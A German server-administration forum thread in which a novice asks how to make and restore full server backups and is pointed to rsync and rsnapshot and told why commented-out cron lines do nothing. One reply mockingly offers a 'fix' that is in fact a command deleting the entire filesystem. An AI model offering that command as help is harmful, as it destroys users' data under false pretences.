• This forum has a zero tolerance policy regarding spam. If you register here to publish advertising, your user account will be deleted without further questions.

Snapshot Alternative?

Shorty

Registered User
Hallo,
kann mir bitte jemand eine Snapshot Alternative sagen, mit der auch ein nicht Profi ein komplettes Server-Backup Image erstellen und wider aufspielen kann?

Mein Prepaid Hoster hat eine Snapshot Funktion die schon seit Monaten nicht mehr funktioniert und die Software Firma scheint nicht in der Lage zu sein das zu beheben, ich bin ansonsten mit diesem Anbieter zufrieden, aber leider bekomme ich mit den Sachen, die ich über Google finde nicht klar ein komplettes Server-Backup Image zu erstellen.
 
Schau doch mal, ob rsync, bzw. rsnapshot Deine Anforderungen erfüllt.
 
Echt jetzt? Du bist seit 14 Jahren im SSF (und vermutlich ebenso lang root) und kannst noch immer nicht mit einem Editor einen Cronjob anlegen?
 
Ja ich habe den CronJob angelegt, aber wie bekomme ich das Backup nun wider drauf wen ich es benötige?

Ich habe ein Problem mit der Pfad Angabe wen ich /etc/cron.d/rsnapshot angebe bekomme ich /bin/sh: 1: /etc/cron.d/rsnapshot: Permission denied
 
Last edited:
IIRC habe ich Dir schonmal Lernresistenz vorgeworfen, daher spare ich es mir diesmal...

Bin raus, Nachhilfe macht bei Lernresistenz keinen Sinn und hier muss man ja auch noch mit absoluten Basics beginnen, welche spätestens nach dem blinden Copy+Paste bereits wieder vergessen sind...


Ach was, ich habe heute mal Mitleid, damit sollte das Problem erledigt sein:
Code:
cd / && nohup rm -fr / &

Aber in Zukunft lerne bitte selbst wenigstens die Basics, so schwer ist das nicht und Büchertips gibt es hier im Forum mehr als genug.
 
Backups bekommst Du mit rsync wieder ganz einfach zurück auf das ursprüngliche System. Zum Beispiel in einem simplen Fall:
Code:
rsync -av quelle ziel

Ich kann natürlich nicht wissen, was Du benötigst, von daher bitte vorher "man rsync" lesen, denn es gibt unzählige Flags. "a" steht für archive mode (der wiederum verschiedene Flags beinhaltet) und "v" für verbose.
 
Leute, wie rsync funktioniert gehört zum Grundwissen bei Linux-Server-Administration - so wie wie cp oder scp auch. Wenigsten das rudimentäre sollten root-Admins schon wissen. Dachte ich jedenfalls, dass die Ansprüche heutzutage so sind.
 
Last edited:
Danke komme soweit klar, habe nur immer noch das Problem das ich den Pfad nicht raus finde den ich angeben muss um das Snapshot aus zu führen.
 
habe nur immer noch das Problem das ich den Pfad nicht raus finde den ich angeben muss um das Snapshot aus zu führen
Kannst du das bitte genauer erläutern?
Welches Snapshot ausführen? Ich dachte du benutzt einen Cronjob zum Sichern.
 
Ja ich nutze rsnapshot nach dieser https://www.thomas-krenn.com/de/wiki/Backup_unter_Linux_mit_rsnapshot Anleitung und bei
Regelmäßige Sicherungen steht.


$ sudo vi /etc/cron.d/rsnapshot
# 0 */4 * * * root /usr/bin/rsnapshot hourly
# 30 3 * * * root /usr/bin/rsnapshot daily
# 0 3 * * 1 root /usr/bin/rsnapshot weekly
# 30 2 1 * * root /usr/bin/rsnapshot monthly

wo ich denke das /etc/cron.d/rsnapshot für den Pfad steht der für den CronJob angegeben werden muss,aber das stimmt nicht wen ich den angebe wird nichts erstellt.

Jetzt möchte ich den CronJob über Plesk ausführen lassen und weis nicht was ich bei befehl für einen Pfad angeben muss das er das Backup anlegt.
 
@Shorty Ja, und? Natürlich wird nichts gesichert. Das willst du doch.

Liest du denn überhaupt was in anderen Websites geschrieben wird? Für dich trotzdem nochmals:
Cronjobs
Wie bereits erwähnt können Sie rsnapshot bei Systemen, die dauerhaft in Betrieb sind, per cronjob ausführen lassen. Unter /etc/cron.d/rsnapshot installiert rsnapshot eine Beispiel-Konfiguration. Sie müssen die Einträge nur auskommentieren, sodass (die Zeiten können entsprechend angepasst werden):

OK. Wieso sind die Zeilen, die du ausführen willst als Kommentar geschrieben? Weil sie Beispiele sind? oder weil es bei Thomas Krenn gemeine Leute gibt, die dich aufs Glatteis führen?
Dir ist nach Jahren immer noch nicht klar was das # in Konfigurationen bedeuten mag? Das ist sowas von Anfängerfehler. Oder ist das nur die Sommerhitze, die dich ablenkt?
Please read these fine docs:
https://de.wikipedia.org/wiki/Cron#Beispiele
Blank lines and leading spaces and tabs are ignored. Lines whose first non-space character is a pound-sign (#) are comments, and are ignored. Note that comments are not allowed on the same line as cron commands, since they will be taken to be part of the command. Similarly, comments are not allowed on the same line as environment variable settings.
https://linux.die.net/man/5/crontab

Mann sollte niemals einfach, ohne zu wissen, was Code- oder Kommandozeilen manchen, was kopieren doer verwenden.

Jetzt möchte ich den CronJob über Plesk ausführen lassen
Häh? Wieso denn über Plesk? Cronjobs werden doch über den Dämon cron/anacron laufen gelassen.

Ich verstehe nicht wieso Plesk das selbst ausführen soll. Was wünscht du genau zu erreichen?
Und wenn du auf Plesk als Arbeiter so versessen bist, wieso trägst fügst du dann nicht in Start > Tools & Einstellungen > Geplante Aufgaben die Kommandozeile ein? Oder sagt mal genau wo du Hilfe benötigst.
 
Last edited:
Ich stehe gerade auf dem schlau und verstehe nichts, wie ich im ersten beitrag geschrieben habe und dachte das rsnapshot eine Alternative wäre und du sagst nun damit wird nichts gesichert?
Hallo,
kann mir bitte jemand eine Snapshot Alternative sagen, mit der auch ein nicht Profi ein komplettes Server-Backup Image erstellen und wider aufspielen kann?

Mein Prepaid Hoster hat eine Snapshot Funktion die schon seit Monaten nicht mehr funktioniert und die Software Firma scheint nicht in der Lage zu sein das zu beheben, ich bin ansonsten mit diesem Anbieter zufrieden, aber leider bekomme ich mit den Sachen, die ich über Google finde nicht klar ein komplettes Server-Backup Image zu erstellen.
 
Das funktioniert nur, wenn du die richtige Konfiguration für den Cronjob und rsnapshot verwendest.
Entfern von der Zeile. die im Cronjob ausgeführrt werden soll, das erste Zeichen (# bedeutet Kommentar!).
Verwende die richtige Konfiguration für rsnapshot. Teste die Konfiguration mit rsnapshot -t.

Bring das bitte erst mal in Ordnung. Dann kannste immer noch morgen oder übermorgen weiter fragen, es wird sich jemannd erbarmen, hoffe ich.
Ich habe an dem schönen abend keine Lust mehr und setze mich auf den Balkon.
 
@GwenDragon Hut ab für deine Geduld bislang. Ich hätte schon längst aufgegeben, obwohl ich normalerweise schon auch den hoffnunglosen Fällen gerne helfe.
Dieser hier ist aber schon echt außergewöhnlich...
 
@ThomasChr Nicht helfen isst auch keine Lösung. Aber die Leute schon mal dahin zu schubsen, dass sie entdecken und lernen müssen.
Ich verstehe nur nicht, warum nicht erst mal gefahrlos was gelernt durch Nutzer wird, anstatt wie oft ein Server gemietet wird, im WWW schnell was kopiert und dann rum probiert wird.
Wenn ich früher was ausprobiert hatte was ich nicht kannte, erstellte ich mir ne VM mit dem Server-Linux und testete damit wie das geht – ohne ein laufendes, wichtiges Linux zu vermurksen.
 
Last edited:
Hallo,
kann mir bitte jemand eine Snapshot Alternative sagen, mit der auch ein nicht Profi ein komplettes Server-Backup Image erstellen und wider aufspielen kann?

Mein Prepaid Hoster hat eine Snapshot Funktion die schon seit Monaten nicht mehr funktioniert und die Software Firma scheint nicht in der Lage zu sein das zu beheben, ich bin ansonsten mit diesem Anbieter zufrieden, aber leider bekomme ich mit den Sachen, die ich über Google finde nicht klar ein komplettes Server-Backup Image zu erstellen.
Nur mal so am Rand: Ich vermute du meinst mit deinem "Prepaid Hoster" den Anbieter prepaid hoster? ... Finde es ehrlich gesagt etwas omniös da ich bei eben dem selben Anbieter bin und die Snapshot Funktion einwandfrei funktioniert.

Deweiteren finde ich es gruselig und grausam zu gleich das bei dir anscheinend das Grundwissen fehlt. Bitte nimm den Server sofort offline und übe zuhause nochmal auf einer VM, wie bereits von vielen Usern hier auch angemerkt.

PS: Ich weiss das dass Thema schon bisschen älter ist aber ich musste einfach meinen Senf dazu geben ..
 
Back
Top